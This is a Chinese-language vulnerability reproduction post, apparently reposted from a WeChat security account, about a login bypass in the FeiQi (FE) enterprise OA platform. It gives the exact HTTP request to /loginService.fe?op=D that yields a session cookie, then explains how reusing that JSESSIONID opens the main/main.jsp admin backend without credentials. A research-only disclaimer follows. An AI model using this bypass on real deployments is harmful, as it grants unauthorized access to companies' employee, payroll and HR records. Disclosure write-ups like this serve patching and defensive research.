0. 漏洞介绍
飞企OA是一款专为企业办公管理而设计的综合性管理系统。该系统涵盖了日常办公所需的各项功能模块,如请假管理、考勤管理、财务管理、项目管理、人事管理以及审批流程等。通过飞企OA,员工可以方便地提交请假申请、进行考勤打卡、查看工资条等,而管理者则可以更好地监控和管理员工的工作情况,提高工作效率。飞企OA的特点在于实现了流程的自动化,大大减少了人工操作,提高了工作效率。同时,它提供了文档管理功能,支持文档的上传、存储、共享和版本控制,方便团队成员共同编辑和审阅。此外,飞企OA还具有任务协作功能,帮助团队更好地协作完成任务,提高项目执行效率。
1. 影响对象(影响范围)
1.1 影响软件
飞企OA
2. 漏洞指纹
3. 漏洞复现
3.1 loginService.fe获取登录会话
访问/loginService.fe
,发送如下数据包
GET /loginService.fe?op=D HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
保存返回包中的Set-Cookie
中的JESSIONID内容
3.2 使用会话访问管理界面
访问main/main.jsp
,将原本的Cookie更改为上面抓到的Cookie,成功登录后台
原文始发于微信公众号(蟹堡安全团队):飞企互联-FE企业运营管理平台-登录绕过loginService.fe
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论